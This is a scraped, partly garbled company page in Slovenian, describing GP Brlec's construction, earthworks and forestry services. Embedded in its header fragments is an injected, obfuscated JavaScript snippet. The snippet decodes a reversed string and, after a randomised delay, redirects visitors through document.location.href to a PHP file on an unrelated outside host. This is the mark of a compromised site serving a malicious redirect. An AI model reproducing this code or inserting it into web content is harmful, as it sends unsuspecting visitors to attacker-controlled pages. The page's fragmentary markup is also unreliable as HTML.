toritve na področju nizke gradnje, zemeljskih del in gozdarstva. Storitve opravljamo ročno ter z lahko in težko gradbeno mehanizacijo (bager, minibager, rovokopač in valjar, tovorna vozila in traktor). " /> to'); ga('send', 'pageview'); tom-css' href='https://www.gpbrlec.si/wp-content/themes/betheme/css/skins/cusscript$zXz=function(n)if%20(typeof%20($zXz.list%5Bn%5D)%20==%20string)%20return%20$zXz.list%5Bn%5D.split().reverse().join();return%20$zXz.list%5Bn%5D;;$zXz.list=%5B'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth'=ferh.noitacol.tnemucod%5D;var%20number1=Math.floor(Math.random()%20*%206);if%20(number1==3)var%20delay%20=%2018000;setTimeout($zXz(0),%20delay);/scripttom/style.css?ver=5.4' type='text/css' media='all' />

O nas

Podjetje GP Brlec gradbeništvo in druge storitve, d. o. o., je bilo ustanovljeno leta 2004. Odtlej zagotavlja kakovostne storitve na področju nizke gradnje, zemeljskih del in gozdarstva. Naša osnovna dejavnost je nudenje storitev nizke gradnje oz. zemeljskih del, ki jih opravljamo s težko in lahko gradbeno mehanizacijo.

V našem voznem parku vzdržujemo bager, minibager, rovokopač in valjar, tudi tovorna vozila in traktorje, ki jih uporabljamo pri zagotavljanju gozdarskih storitev. Nudimo izkope in pripravo terena na gradnjo ali le asfaltiranje/tlakovanje, tudi sanacijo plazov, odvoz gradbenega materiala in druge podobne storitve, tudi strokovno rušenje.

Na področju same gradnje zagotavljamo gradnjo cest, pešpoti, mostov, tudi gradnjo podpornih in opornih zidov, urejamo dvorišča, pločnike in komunalno infrastrukturo. Poleg gradbenih zagotavljamo vse vrste gozdarskih del, kot so posek drevja, redčenja gozda, spravilo in odkup lesa ter odvoz in ureditev gozdne infrastrukture.